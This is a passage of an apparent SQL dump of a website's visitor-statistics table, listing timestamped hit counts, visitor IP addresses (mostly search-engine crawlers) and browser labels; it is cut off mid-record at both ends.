,2,0,0,'157.55.39.104','other'),(506790,1590015323,1,1,0,0,'66.249.70.72','chrome'),(506791,1590015613,1,0,1,0,'66.249.70.70',''),(506792,1590015895,1,1,0,0,'157.55.39.164','other'),(506793,1590016017,1,1,0,0,'207.46.13.109','other'),(506794,1590016048,3,3,0,0,'178.154.200.222','other'),(506795,1590016060,8,8,0,0,'77.87.41.75','other'),(506796,1590016382,8,8,0,0,'77.120.98.235','other'),(506797,1590016566,2,2,0,0,'178.154.200.196','other'),(506798,1590017280,1,1,0,0,'178.154.200.222','other'),(506799,1590017450,8,8,0,0,'77.87.41.75','other'),(506800,1590017607,1,1,0,0,'213.180.203.16','other'),(506801,1590018152,2,2,0,0,'8.29.198.26','other'),(506802,1590018421,1,1,0,0,'213.180.203.29','other'),(506803,1590018517,1,1,0,0,'213.180.203.50','other'),(506804,1590018611,8,8,0,0,'77.120.98.235','other'),(506805,1590018729,1,1,0,0,'178.154.200.106','other'),(506806,1590018906,1,1,0,0,'62.205.134.182','other'),(506807,1590018919,2,2,0,0,'178.154.200.222','other'),(506808,1590019098,1,1,0,0,'178.154.200.231','other'),(506809,1590019148,1,1,0,0,'157.55.39.104','other'),(506810,1590019173,8,8,0,0,'77.87.41.5','other'),(506811,1590019595,1,1,0,0,'178.154.200.86','other'),(506812,1590019617,1,1,0,0,'157.55.39.248','other'),(506813,1590019883,1,1,0,0,'178.154.200.155','other'),(506814,1590020041,1,1,0,0,'178.154.200.222','other'),(506815,1590020087,1,1,0,0,'213.180.203.16','other'),(506816,1590020136,1,1,0,0,'207.46.13.109','other'),(506817,1590020679,1,1,0,0,'178.154.200.216','other'),(506818,1590021057,2,2,0,0,'157.55.39.104','other'),(506819,1590021064,3,3,0,0,'178.154.200.222','other'),(506820,1590021149,8,8,0,0,'77.120.98.235','other'),(506821,1590021238,1,1,0,0,'213.180.203.16','other'),(506822,1590021325,1,1,0,0,'178.154.200.17','other'),(506823,1590021480,1,1,0,0,'51.68.227.232','chrome'),(506824,1590021792,1,1,0,0,'157.55.39.248','other'),(506825,1590021814,8,8,0,0,'77.87.41.5','other'),(506826,1590021954,1,1,0,0,'207.46.13.109','other'),(506827,1590022076,1,1,0,0,'178.154.200.72','other'),(506828,1590022123,1,1,0,0,'178.154.200.86','other'),(506829,1590022198,1,1,0,0,'178.154.200.222','other'),(506830,1590023067,1,1,0,0,'213.180.203.142','other'),(506831,1590023570,1,1,0,0,'178.154.200.222','other'),(506832,1590023597,8,8,0,0,'77.120.98.235','other'),(506833,1590023910,1,1,0,0,'34.220.41.4','other'),(506834,1590024246,8,8,0,0,'77.87.41.5','other'),(506835,1590024748,1,1,0,0,'178.159.37.88','chrome'),(506836,1590024871,1,1,0,0,'178.154.200.222','other'),(506837,1590024932,1,1,0,0,'178.154.200.236','other'),(506838,1590025229,1,1,0,0,'207.46.13.109','other'),(506839,1590025989,1,1,0,0,'66.249.70.69','chrome'),(506840,1590026100,8,8,0,0,'77.120.98.235','other'),(506841,1590026159,2,2,0,0,'66.249.64.38','chrome'),(506842,1590026261,5,5,0,0,'66.249.64.33','chrome'),(506843,1590026329,1,1,0,0,'207.46.13.109','other'),(506844,1590026364,4,4,0,0,'66.249.64.36','chrome'),(506845,1590026376,2,0,2,0,'66.249.70.70',''),(506846,1590026718,8,8,0,0,'77.87.41.124','other'),(506847,1590026963,1,1,0,0,'178.154.200.175','other'),(506848,1590027276,1,1,0,0,'213.180.203.16','other'),(506849,1590027318,4,4,0,0,'66.249.64.36','chrome'),(506850,1590027343,1,0,1,0,'66.249.70.69',''),(506851,1590027385,1,1,0,0,'207.46.13.36','other'),(506852,1590027799,2,2,0,0,'66.249.64.38','chrome'),(506853,1590027816,3,3,0,0,'66.249.64.33','chrome'),(506854,1590027872,12,12,0,0,'66.249.70.70','chrome'),(506855,1590027877,38,37,1,0,'66.249.70.69',''),(506856,1590027916,3,3,0,0,'178.154.200.222','other'),(506857,1590027917,7,7,0,0,'66.249.70.72','chrome'),(506858,1590028225,2,2,0,0,'207.46.13.109','other'),(506859,1590028271,14,13,1,0,'66.249.70.69',''),(506860,1590028322,6,6,0,0,'66.249.64.36','chrome'),(506861,1590028511,8,8,0,0,'77.120.98.235','other'),(506862,1590028552,3,2,1,0,'66.249.70.69',''),(506863,1590028631,25,24,1,0,'66.249.70.69',''),(506864,1590028794,14,14,0,0,'66.249.70.70','chrome'),(506865,1590028973,2,2,0,0,'8.29.198.27','other'),(506866,1590029110,2,2,0,0,'66.249.64.33','chrome'),(506867,1590029260,2,1,1,0,'66.249.70.69',''),(506868,1590029375,4,3,1,0,'66.249.70.69',''),(506869,1590029407,3,3,0,0,'66.249.64.36','chrome'),(506870,1590029415,4,3,1,0,'66.249.70.69',''),(506871,1590029439,8,8,0,0,'77.87.41.124','other'),(506872,1590029494,1,1,0,0,'213.180.203.16','other'),(506873,1590029564,3,3,0,0,'66.249.70.69','chrome'),(506874,1590030050,1,1,0,0,'66.249.70.70','chrome'),(506875,1590030685,1,1,0,0,'213.180.203.16','other'),(506876,1590030979,8,8,0,0,'77.120.98.235','other'),(506877,1590031144,1,1,0,0,'66.249.70.72','chrome'),(506878,1590031293,1,1,0,0,'157.55.39.236','other'),(506879,1590031320,2,1,1,0,'66.249.70.69',''),(506880,1590031902,8,8,0,0,'77.87.41.5','other'),(506881,1590031910,1,1,0,0,'157.55.39.104','other'),(506882,1590032013,1,0,1,0,'66.249.70.70',''),(506883,1590032162,1,1,0,0,'207.46.13.109','other'),(506884,1590032244,1,1,0,0,'178.154.200.97','other'),(506885,1590033403,1,1,0,0,'178.154.200.222','other'),(506886,1590033500,8,8,0,0,'77.120.98.235','other'),(506887,1590033524,1,1,0,0,'66.249.64.38','chrome'),(506888,1590033527,1,0,1,0,'66.249.64.36',''),(506889,1590034108,1,1,0,0,'207.46.13.91','other'),(506890,1590035258,1,1,0,0,'5.44.174.37','chrome'),(506891,1590035838,3,3,0,0,'66.249.70.72','chrome'),(506892,1590035925,4,4,0,0,'178.154.200.222','other'),(506893,1590035998,8,8,0,0,'77.120.98.235','other'),(506894,1590036291,1,1,0,0,'62.205.134.182','other'),(506895,1590036498,1,1,0,0,'157.55.39.236','other'),(506896,1590036595,1,1,0,0,'66.249.64.38','chrome'),(506897,1590036745,1,1,0,0,'37.73.91.143','chrome'),(506898,1590037353,2,2,0,0,'66.249.70.72','chrome'),(506899,1590037369,1,1,0,0,'178.154.200.220','other'),(506900,1590037502,2,2,0,0,'66.249.64.33','chrome'),(506901,1590037576,5,5,0,0,'66.249.70.70','chrome'),(506902,1590037732,1,1,0,0,'178.154.200.245','other'),(506903,1590037918,5,5,0,0,'66.249.70.69','chrome'),(506904,1590038165,2,2,0,0,'207.46.13.91','other'),(506905,1590038297,1,1,0,0,'213.180.203.122','other'),(506906,1590038567,1,1,0,0,'213.180.203.16','other'),(506907,1590038577,8,8,0,0,'77.120.98.235','other'),(506908,1590038643,4,4,0,0,'178.154.200.222','other'),(506909,1590038869,1,1,0,0,'213.180.203.17','other'),(506910,1590039170,2,2,0,0,'66.249.70.70','chrome'),(506911,1590039172,2,2,0,0,'207.46.13.91','other'),(506912,1590039183,1,1,0,0,'91.196.178.70','chrome'),(506913,1590039333,3,3,0,0,'66.249.70.72','chrome'),(506914,1590039794,1,1,0,0,'8.29.198.25','other'),(506915,1590039877,3,3,0,0,'66.249.70.69','chrome'),(506916,1590040057,1,1,0,0,'8.29.198.26','other'),(506917,1590040204,2,2,0,0,'66.249.70.70','chrome'),(506918,1590040301,1,1,0,0,'213.180.203.190','other'),(506919,1590040761,1,1,0,0,'178.154.200.222','other'),(506920,1590040873,1,1,0,0,'176.37.53.88','firefox'),(506921,1590041007,2,2,0,0,'66.249.70.69','chrome'),(506922,1590041152,1,1,0,0,'66.249.70.70','chrome'),(506923,1590041190,8,8,0,0,'77.120.98.235','other'),(506924,1590041523,2,2,0,0,'66.249.70.72','chrome'),(506925,1590041534,1,1,0,0,'207.46.13.91','other'),(506926,1590041880,1,1,0,0,'66.249.64.36','chrome'),(506927,1590041905,1,1,0,0,'91.196.178.70','chrome'),(506928,1590041933,2,2,0,0,'178.154.200.196','other'),(506929,1590042430,1,1,0,0,'178.154.200.222','other'),(506930,1590042445,2,2,0,0,'66.249.70.69','chrome'),(506931,1590042521,1,1,0,0,'213.180.203.142','other'),(506932,1590042775,2,2,0,0,'91.196.177.15','other'),(506933,1590042822,1,1,0,0,'157.55.39.59','other'),(506934,1590042887,4,4,0,0,'66.249.70.70','chrome'),(506935,1590042945,3,3,0,0,'66.249.70.72','chrome'),(506936,1590043038,2,2,0,0,'66.249.64.33','chrome'),(506937,1590043045,1,1,0,0,'66.249.64.36','chrome'),(506938,1590043397,1,1,0,0,'66.249.70.69','chrome'),(506939,1590043825,1,1,0,0,'178.154.200.187','other'),(506940,1590043917,8,8,0,0,'77.120.98.235','other'),(506941,1590044011,2,2,0,0,'66.249.70.72','chrome'),(506942,1590044380,1,1,0,0,'66.249.70.70','chrome'),(506943,1590044513,1,1,0,0,'46.202.232.23','other'),(506944,1590044946,1,1,0,0,'131.220.6.152','chrome'),(506945,1590045193,1,1,0,0,'178.154.200.196','other'),(506946,1590045492,3,3,0,0,'66.249.70.70','chrome'),(506947,1590045738,2,2,0,0,'157.55.39.59','other'),(506948,1590045742,2,2,0,0,'207.46.13.91','other'),(506949,1590046094,4,4,0,0,'66.249.70.69','chrome'),(506950,1590046297,3,3,0,0,'66.249.70.72','chrome'),(506951,1590046719,8,8,0,0,'77.120.98.235','other'),(506952,1590047516,1,1,0,0,'157.55.39.59','other'),(506953,1590047730,2,2,0,0,'66.249.70.70','chrome'),(506954,1590047743,3,3,0,0,'178.154.200.222','other'),(506955,1590047885,1,1,0,0,'95.132.28.116','chrome'),(506956,1590048142,3,3,0,0,'66.249.70.72','chrome'),(506957,1590048526,1,1,0,0,'66.249.70.69','chrome'),(506958,1590048720,1,1,0,0,'88.99.2.203','other'),(506959,1590049184,2,2,0,0,'178.154.200.222','other'),(506960,1590049296,8,8,0,0,'77.120.98.235','other'),(506961,1590049519,1,1,0,0,'91.124.181.168','chrome'),(506962,1590049626,2,2,0,0,'207.46.13.91','other'),(506963,1590049666,1,1,0,0,'178.154.200.220','other'),(506964,1590049950,1,1,0,0,'178.154.200.207','other'),(506965,1590050270,1,1,0,0,'178.154.200.222','other'),(506966,1590050619,1,1,0,0,'8.29.198.27','other'),(506967,1590050662,1,1,0,0,'213.180.203.16','other'),(506968,1590050702,3,3,0,0,'144.76.38.10','other'),(506969,1590050846,2,2,0,0,'66.249.70.72','chrome'),(506970,1590050893,1,1,0,0,'8.29.198.26','other'),(506971,1590051639,1,1,0,0,'178.154.200.112','other'),(506972,1590051753,3,3,0,0,'66.249.70.70','chrome'),(506973,1590051778,1,1,0,0,'157.55.39.59','other'),(506974,1590051790,1,1,0,0,'66.249.64.38','chrome'),(506975,1590051799,1,1,0,0,'66.249.64.33','chrome'),(506976,1590051891,1,1,0,0,'91.250.36.64','chrome'),(506977,1590051953,8,8,0,0,'77.120.98.235','other'),(506978,1590052089,1,1,0,0,'178.154.200.222','other'),(506979,1590052094,1,1,0,0,'207.46.13.91','other'),(506980,1590052761,1,1,0,0,'178.154.200.245','other'),(506981,1590052855,1,1,0,0,'178.154.200.86','other'),(506982,1590052966,1,1,0,0,'18.220.133.136','chrome'),(506983,1590053704,1,1,0,0,'207.46.13.91','other'),(506984,1590054175,1,1,0,0,'178.154.200.245','other'),(506985,1590054587,2,2,0,0,'66.249.70.70','chrome'),(506986,1590054667,1,1,0,0,'66.249.70.69','chrome'),(506987,1590054991,8,8,0,0,'77.120.98.235','other'),(506988,1590055210,2,2,0,0,'157.55.39.59','other'),(506989,1590055376,1,1,0,0,'178.154.200.119','other'),(506990,1590055946,1,1,0,0,'66.249.70.72','chrome'),(506991,1590056126,1,1,0,0,'66.249.70.70','chrome'),(506992,1590056244,1,1,0,0,'66.249.70.69','chrome'),(506993,1590057128,1,1,0,0,'178.154.200.222','other'),(506994,1590057215,1,1,0,0,'213.180.203.16','other'),(506995,1590057648,8,8,0,0,'77.120.98.235','other'),(506996,1590057802,2,2,0,0,'66.249.70.70','chrome'),(506997,1590058085,1,1,0,0,'207.46.13.91','other'),(506998,1590058201,1,1,0,0,'66.249.64.36','chrome'),(506999,1590058270,4,4,0,0,'66.249.70.69','chrome'),(507000,1590058688,3,3,0,0,'66.249.70.72','chrome'),(507001,1590058745,1,1,0,0,'66.249.64.46','chrome'),(507002,1590058855,1,1,0,0,'178.154.200.220','other'),(507003,1590058947,1,1,0,0,'66.249.70.70','chrome'),(507004,1590059535,1,1,0,0,'94.153.50.19','chrome'),(507005,1590059959,1,1,0,0,'157.55.39.59','other'),(507006,1590060026,1,1,0,0,'213.180.203.17','other'),(507007,1590060297,8,8,0,0,'77.120.98.235','other'),(507008,1590060442,1,1,0,0,'66.249.64.33','chrome'),(507009,1590060570,2,2,0,0,'195.10.210.70','chrome'),(507010,1590060572,2,2,0,0,'66.249.70.70','chrome'),(507011,1590060796,1,1,0,0,'91.196.178.79','chrome'),(507012,1590060860,3,3,0,0,'207.46.13.77','other'),(507013,1590061274,1,1,0,0,'66.249.70.72','chrome'),(507014,1590061324,3,3,0,0,'66.249.70.69','chrome'),(507015,1590061342,1,1,0,0,'207.46.13.91','other'),(507016,1590061429,1,1,0,0,'178.154.200.222','other'),(507017,1590061441,1,1,0,0,'213.180.203.16','other'),(507018,1590061442,1,1,0,0,'8.29.198.26','other'),(507019,1590061663,1,1,0,0,'66.249.64.36','chrome'),(507020,1590061715,1,1,0,0,'8.29.198.25','other'),(507021,1590061954,2,2,0,0,'157.55.39.59','other'),(507022,1590062341,1,1,0,0,'212.26.142.27','other'),(507023,1590062424,1,1,0,0,'178.154.200.29','other'),(507024,1590062566,1,1,0,0,'178.154.200.216','other'),(507025,1590062774,1,1,0,0,'66.249.64.33','chrome'),(507026,1590062819,2,2,0,0,'66.249.70.69','chrome'),(507027,1590062863,2,2,0,0,'66.249.70.70','chrome'),(507028,1590062968,1,1,0,0,'91.196.177.46','chrome'),(507029,1590063000,8,8,0,0,'77.120.98.235','other'),(507030,1590063085,1,1,0,0,'213.180.203.29','other'),(507031,1590063090,3,3,0,0,'66.249.70.72','chrome'),(507032,1590063352,2,2,0,0,'207.46.13.77','other'),(507033,1590063592,1,1,0,0,'178.154.200.222','other'),(507034,1590064024,2,2,0,0,'207.46.13.91','other'),(507035,1590064044,2,2,0,0,'66.249.64.38','chrome'),(507036,1590064072,1,1,0,0,'178.154.200.100','other'),(507037,1590064250,1,1,0,0,'109.74.154.72','chrome'),(507038,1590064855,1,1,0,0,'207.46.13.77','other'),(507039,1590064997,1,1,0,0,'66.249.70.69','chrome'),(507040,1590065048,1,1,0,0,'213.180.203.90','other'),(507041,1590065138,2,2,0,0,'66.249.70.72','chrome'),(507042,1590065245,1,1,0,0,'213.180.203.16','other'),(507043,1590065281,1,1,0,0,'178.154.200.222','other'),(507044,1590065473,1,1,0,0,'66.249.70.70','chrome'),(507045,1590065596,10,10,0,0,'188.163.17.110','other'),(507046,1590065686,1,1,0,0,'66.249.64.33','chrome'),(507047,1590065721,8,8,0,0,'77.120.98.235','other'),(507048,1590065995,3,3,0,0,'66.249.70.69','chrome'),(507049,1590066492,1,1,0,0,'178.154.200.92','other'),(507050,1590066510,2,2,0,0,'66.249.70.70','chrome'),(507051,1590066536,2,2,0,0,'66.249.64.36','chrome'),(507052,1590066704,1,1,0,0,'66.249.64.33','chrome'),(507053,1590066781,2,2,0,0,'66.249.70.72','chrome'),(507054,1590066799,1,1,0,0,'207.46.13.91','other'),(507055,1590067930,1,1,0,0,'178.154.200.222','other'),(507056,1590068009,2,2,0,0,'66.249.64.33','chrome'),(507057,1590068334,4,4,0,0,'66.249.70.69','chrome'),(507058,1590068444,3,3,0,0,'66.249.70.70','chrome'),(507059,1590068460,2,2,0,0,'66.249.70.72','chrome'),(507060,1590068770,1,1,0,0,'66.249.64.38','chrome'),(507061,1590069394,1,1,0,0,'66.249.70.72','chrome'),(507062,1590069599,1,1,0,0,'66.249.70.69','chrome'),(507063,1590069666,1,1,0,0,'194.61.24.94','other'),(507064,1590069799,1,1,0,0,'207.46.13.214','other'),(507065,1590070004,1,1,0,0,'207.46.13.91','other'),(507066,1590070264,1,1,0,0,'95.132.52.158','chrome'),(507067,1590070297,3,3,0,0,'66.249.70.70','chrome'),(507068,1590070353,1,1,0,0,'66.249.64.38','chrome'),(507069,1590071550,1,1,0,0,'207.46.13.113','other'),(507070,1590071731,43,43,0,0,'5.9.77.102','other'),(507071,1590071839,2,2,0,0,'207.46.13.91','other'),(507072,1590072269,2,2,0,0,'8.29.198.26','other'),(507073,1590072374,1,1,0,0,'66.249.64.36','chrome'),(507074,1590072417,31,31,0,0,'5.9.151.57','other'),(507075,1590073754,1,1,0,0,'66.249.70.69','chrome'),(507076,1590073767,1,1,0,0,'207.46.13.214','other'),(507077,1590073809,2,2,0,0,'66.249.70.70','chrome'),(507078,1590073819,1,1,0,0,'178.154.200.220','other'),(507079,1590073866,1,1,0,0,'66.249.64.36','chrome'),(507080,1590074279,1,1,0,0,'66.249.70.72','chrome'),(507081,1590075158,1,1,0,0,'31.13.127.120','other'),(507082,1590075159,1,1,0,0,'31.13.127.20','other'),(507086,1590075160,1,1,0,0,'31.13.127.112','other'),(507087,1590075367,3,3,0,0,'66.249.70.69','chrome'),(507088,1590075716,1,1,0,0,'66.249.64.36','chrome'),(507089,1590075718,1,1,0,0,'66.249.70.72','chrome'),(507090,1590075993,1,1,0,0,'91.196.178.88','chrome'),(507091,1590076674,1,1,0,0,'66.249.70.72','chrome'),(507092,1590077253,1,1,0,0,'207.46.13.113','other'),(507093,1590077581,1,1,0,0,'157.55.39.74','other'),(507094,1590077639,1,1,0,0,'66.249.70.72','chrome'),(507095,1590077774,1,1,0,0,'207.46.13.214','other'),(507096,1590078372,1,1,0,0,'207.46.13.113','other'),(507097,1590078527,1,0,1,0,'78.109.29.246',''),(507098,1590079473,2,2,0,0,'207.46.13.113','other'),(507099,1590080537,3,3,0,0,'207.46.13.214','other'),(507100,1590080635,1,1,0,0,'207.46.13.196','other'),(507101,1590080977,3,3,0,0,'18.237.153.83','chrome'),(507102,1590080980,2,2,0,0,'18.237.153.83','firefox'),(507103,1590081234,1,1,0,0,'207.46.13.113','other'),(507104,1590081557,8,8,0,0,'77.120.98.235','other'),(507105,1590081862,1,1,0,0,'207.46.13.87','other'),(507106,1590082369,2,2,0,0,'37.73.198.159','chrome'),(507107,1590082907,1,1,0,0,'207.46.13.87','other'),(507108,1590082912,1,1,0,0,'207.46.13.113','other'),(507109,1590082926,1,1,0,0,'91.196.178.65','firefox'),(507110,1590083089,2,2,0,0,'8.29.198.25','other'),(507111,1590083808,2,2,0,0,'207.46.13.87','other'),(507112,1590084086,2,2,0,0,'207.46.13.196','other'),(507113,1590084299,1,1,0,0,'88.155.8.41','chrome'),(507114,1590084513,1,1,0,0,'207.46.13.113','other'),(507115,1590084671,1,1,0,0,'207.46.13.214','other'),(507116,1590085540,1,1,0,0,'207.46.13.196','other'),(507117,1590085786,1,1,0,0,'54.90.34.183','other'),(507118,1590085920,1,1,0,0,'207.46.13.113','other'),(507119,1590086563,2,2,0,0,'207.46.13.87','other'),(507120,1590087513,1,1,0,0,'207.46.13.87','other'),(507121,1590088119,1,1,0,0,'51.77.52.160','chrome'),(507122,1590088172,1,1,0,0,'52.201.221.156','other'),(507123,1590089095,1,1,0,0,'52.201.221.156','other'),(507124,1590089919,1,1,0,0,'130.180.209.6','chrome'),(507125,1590090087,1,1,0,0,'52.201.221.156','other'),(507126,1590090902,1,1,0,0,'5.3.218.33','chrome'),(507127,1590091080,1,1,0,0,'66.249.70.69','chrome'),(507128,1590091097,1,1,0,0,'52.201.221.156','other'),(507129,1590091153,1,1,0,0,'66.249.64.36','chrome'),(507130,1590091266,2,2,0,0,'66.249.70.70','chrome'),(507131,1590091442,2,2,0,0,'66.249.70.72','chrome'),(507132,1590092094,1,1,0,0,'52.201.221.156','other'),(507133,1590092588,1,1,0,0,'66.249.64.36','chrome'),(507134,1590092887,4,4,0,0,'66.249.64.24','chrome'),(507135,1590092926,3,3,0,0,'66.249.70.68','chrome'),(507136,1590092983,4,4,0,0,'66.249.70.70','chrome'),(507137,1590093091,1,1,0,0,'52.201.221.156','other'),(507138,1590093175,5,5,0,0,'66.249.64.23','chrome'),(507139,1590093362,1,1,0,0,'92.38.136.69','chrome'),(507140,1590093726,2,2,0,0,'157.55.39.213','other'),(507141,1590093805,1,1,0,0,'66.249.64.24','chrome'),(507142,1590093916,1,1,0,0,'8.29.198.25','other'),(507143,1590094080,1,1,0,0,'52.201.221.156','other'),(507144,1590094108,1,1,0,0,'66.249.64.25','chrome'),(507145,1590094199,1,1,0,0,'8.29.198.26','other'),(507146,1590095072,1,1,0,0,'52.201.221.156','other'),(507147,1590095166,1,1,0,0,'207.180.255.81','firefox'),(507148,1590095172,3,3,0,0,'66.249.70.69','chrome'),(507149,1590096065,1,1,0,0,'52.201.221.156','other'),(507150,1590096386,3,3,0,0,'18.237.41.30','firefox'),(507151,1590096391,1,1,0,0,'18.237.41.30','chrome'),(507153,1590096999,2,2,0,0,'66.249.70.72','chrome'),(507154,1590097000,1,1,0,0,'52.201.221.156','other'),(507155,1590097314,1,1,0,0,'207.46.13.20','other'),(507156,1590097740,1,1,0,0,'54.36.149.3','other'),(507157,1590097809,3,3,0,0,'34.212.172.22','firefox'),(507158,1590097814,1,1,0,0,'34.212.172.22','chrome'),(507160,1590097988,1,1,0,0,'52.201.221.156','other'),(507161,1590098322,1,1,0,0,'207.46.13.196','other'),(507162,1590098896,1,1,0,0,'66.249.70.69','chrome'),(507163,1590098979,1,1,0,0,'52.201.221.156','other'),(507164,1590099268,2,2,0,0,'157.55.39.213','other'),(507165,1590099477,1,1,0,0,'178.154.200.56','other'),(507166,1590099524,1,1,0,0,'34.211.44.175','firefox'),(507167,1590099528,4,4,0,0,'34.211.44.175','chrome'),(507168,1590099906,1,1,0,0,'52.201.221.156','other'),(507169,1590100226,2,2,0,0,'66.249.70.72','chrome'),(507170,1590100383,2,2,0,0,'66.249.70.69','chrome'),(507171,1590100547,1,1,0,0,'178.154.200.220','other'),(507172,1590100641,1,1,0,0,'178.154.200.245','other'),(507173,1590100808,1,1,0,0,'52.201.221.156','other'),(507174,1590100874,1,1,0,0,'157.55.39.213','other'),(507175,1590101227,2,1,1,0,'66.249.70.70',''),(507176,1590101783,6,6,0,0,'66.249.70.70','chrome'),(507177,1590101797,1,1,0,0,'52.201.221.156','other'),(507178,1590101841,2,2,0,0,'66.249.64.33','chrome'),(507179,1590102092,2,2,0,0,'66.249.70.72','chrome'),(507180,1590102188,1,1,0,0,'66.249.64.38','chrome'),(507181,1590102260,1,1,0,0,'207.46.13.196','other'),(507182,1590102472,1,1,0,0,'157.55.39.213','other'),(507183,1590102509,1,1,0,0,'66.249.70.69','chrome'),(507184,1590102788,1,1,0,0,'52.201.221.156','other'),(507185,1590102946,1,1,0,0,'207.46.13.20','other'),(507186,1590103168,1,1,0,0,'213.180.203.122','other'),(507187,1590103518,1,1,0,0,'178.154.200.220','other'),(507188,1590103537,1,1,0,0,'66.249.70.69','chrome'),(507189,1590103669,8,8,0,0,'77.120.98.235','other'),(507190,1590103700,1,1,0,0,'52.201.221.156','other'),(507191,1590103780,2,2,0,0,'157.55.39.213','other'),(507192,1590103783,2,2,0,0,'66.249.70.72','chrome'),(507193,1590103870,1,1,0,0,'66.249.64.33','chrome'),(507194,1590103983,1,1,0,0,'207.46.13.196','other'),(507195,1590104046,5,5,0,0,'66.249.70.70','chrome'),(507196,1590104054,1,1,0,0,'66.249.64.36','chrome'),(507197,1590104687,1,1,0,0,'52.201.221.156','other'),(507198,1590104744,1,1,0,0,'66.249.70.69','chrome'),(507199,1590104746,2,2,0,0,'8.29.198.27','other'),(507200,1590104790,2,2,0,0,'178.154.200.222','other'),(507201,1590105306,1,1,0,0,'62.205.134.182','other'),(507202,1590105381,1,1,0,0,'213.180.203.101','other'),(507203,1590105391,1,1,0,0,'207.46.13.196','other'),(507204,1590105674,1,1,0,0,'52.201.221.156','other'),(507205,1590105701,1,1,0,0,'207.46.13.72','other'),(507206,1590105837,3,3,0,0,'66.249.70.69','chrome'),(507207,1590105849,1,1,0,0,'66.249.70.72','chrome'),(507208,1590105950,1,1,0,0,'66.249.64.36','chrome'),(507209,1590106000,1,1,0,0,'66.249.73.65','chrome'),(507210,1590106180,1,1,0,0,'213.180.203.142','other'),(507211,1590106292,1,1,0,0,'2.47.39.211','other'),(507212,1590106664,1,1,0,0,'52.201.221.156','other'),(507213,1590107373,1,1,0,0,'178.154.200.41','other'),(507214,1590107422,1,1,0,0,'66.249.70.72','chrome'),(507215,1590107559,1,1,0,0,'178.154.200.236','other'),(507216,1590107623,1,1,0,0,'213.180.203.2','other'),(507217,1590107671,1,1,0,0,'52.201.221.156','other'),(507218,1590107709,1,1,0,0,'66.249.70.69','chrome'),(507219,1590107754,1,1,0,0,'178.154.200.222','other'),(507220,1590107878,1,1,0,0,'66.249.70.70','chrome'),(507221,1590108087,1,1,0,0,'207.46.13.72','other'),(507222,1590108657,1,1,0,0,'52.201.221.156','other'),(507223,1590108991,2,2,0,0,'66.249.64.133','chrome'),(507224,1590109086,1,1,0,0,'178.154.200.25','other'),(507225,1590109092,3,3,0,0,'66.249.64.136','chrome'),(507226,1590109339,1,1,0,0,'66.249.64.134','chrome'),(507227,1590109581,1,1,0,0,'52.201.221.156','other'),(507228,1590109790,1,1,0,0,'213.180.203.145','other'),(507229,1590110045,1,1,0,0,'178.154.200.220','other'),(507230,1590110590,1,1,0,0,'52.201.221.156','other'),(507231,1590110697,1,1,0,0,'178.154.200.222','other'),(507232,1590110726,1,1,0,0,'213.180.203.16','other'),(507233,1590110913,4,4,0,0,'66.249.64.133','chrome'),(507234,1590110927,1,1,0,0,'178.154.200.236','other'),(507235,1590110945,2,2,0,0,'207.46.13.72','other'),(507236,1590110958,4,4,0,0,'66.249.64.134','chrome'),(507237,1590111256,1,1,0,0,'66.249.70.38','chrome'),(507238,1590111576,1,1,0,0,'52.201.221.156','other'),(507239,1590111755,3,3,0,0,'178.154.200.222','other'),(507240,1590111824,8,8,0,0,'77.120.98.235','other'),(507241,1590112563,1,1,0,0,'52.201.221.156','other'),(507242,1590112926,2,2,0,0,'66.249.64.33','chrome'),(507243,1590113264,3,3,0,0,'66.249.70.72','chrome'),(507244,1590113403,1,1,0,0,'207.46.13.196','other'),(507245,1590113468,2,1,1,0,'66.249.70.70',''),(507246,1590113492,1,1,0,0,'66.249.70.69','chrome'),(507247,1590113548,1,1,0,0,'52.201.221.156','other'),(507248,1590113662,2,2,0,0,'66.249.70.70','chrome'),(507249,1590113678,1,1,0,0,'213.180.203.16','other'),(507250,1590113830,1,1,0,0,'213.180.203.109','other'),(507251,1590114271,8,8,0,0,'77.120.98.235','other'),(507252,1590114386,1,1,0,0,'178.154.200.220','other'),(507253,1590114474,1,1,0,0,'66.249.70.69','chrome'),(507254,1590114517,1,1,0,0,'66.249.64.33','chrome'),(507255,1590114561,1,1,0,0,'52.201.221.156','other'),(507256,1590114970,3,3,0,0,'178.154.200.222','other'),(507257,1590115484,1,1,0,0,'178.154.200.62','other'),(507258,1590115549,1,1,0,0,'52.201.221.156','other'),(507259,1590115568,1,1,0,0,'8.29.198.25','other'),(507260,1590115613,1,1,0,0,'66.249.70.69','chrome'),(507261,1590115856,1,1,0,0,'8.29.198.26','other'),(507262,1590115891,1,1,0,0,'66.249.70.70','chrome'),(507263,1590116276,1,1,0,0,'178.154.200.222','other'),(507264,1590116538,1,1,0,0,'52.201.221.156','other'),(507265,1590116753,8,8,0,0,'77.120.98.235','other'),(507266,1590116882,1,1,0,0,'178.154.200.234','other'),(507267,1590117356,5,5,0,0,'66.249.64.24','chrome'),(507268,1590117528,1,1,0,0,'52.201.221.156','other'),(507269,1590117565,1,1,0,0,'178.154.200.222','other'),(507270,1590117740,1,1,0,0,'178.154.200.236','other'),(507271,1590117833,1,1,0,0,'178.154.200.220','other'),(507272,1590118110,1,1,0,0,'66.249.70.65','chrome'),(507273,1590118530,1,1,0,0,'52.201.221.156','other'),(507274,1590118731,1,1,0,0,'157.55.39.162','other'),(507275,1590118787,1,1,0,0,'178.154.200.222','other'),(507276,1590118835,1,1,0,0,'66.249.70.72','chrome'),(507277,1590118840,2,2,0,0,'66.249.70.70','chrome'),(507278,1590118911,1,1,0,0,'79.137.32.88','firefox'),(507279,1590119275,8,8,0,0,'77.120.98.235','other'),(507280,1590119516,1,1,0,0,'52.201.221.156','other'),(507281,1590119926,3,3,0,0,'66.249.70.69','chrome'),(507282,1590120287,1,1,0,0,'178.154.200.196','other'),(507283,1590120341,3,3,0,0,'66.249.70.72','chrome'),(507284,1590120370,4,4,0,0,'66.249.64.38','chrome'),(507285,1590120501,1,1,0,0,'52.201.221.156','other'),(507286,1590120630,1,1,0,0,'178.154.200.236','other'),(507287,1590120898,1,1,0,0,'213.180.203.122','other'),(507288,1590120948,1,1,0,0,'213.180.203.16','other'),(507289,1590121271,1,1,0,0,'66.249.70.69','chrome'),(507290,1590121398,2,2,0,0,'178.154.200.222','other'),(507291,1590121456,1,1,0,0,'52.201.221.156','other'),(507292,1590121816,8,8,0,0,'77.120.98.235','other'),(507293,1590121942,1,1,0,0,'178.154.200.220','other'),(507294,1590122603,1,1,0,0,'52.201.221.156','other'),(507295,1590122816,1,1,0,0,'62.205.134.182','other'),(507296,1590122977,2,2,0,0,'178.154.200.222','other'),(507297,1590123102,3,3,0,0,'213.180.203.16','other'),(507298,1590123517,1,1,0,0,'52.201.221.156','othe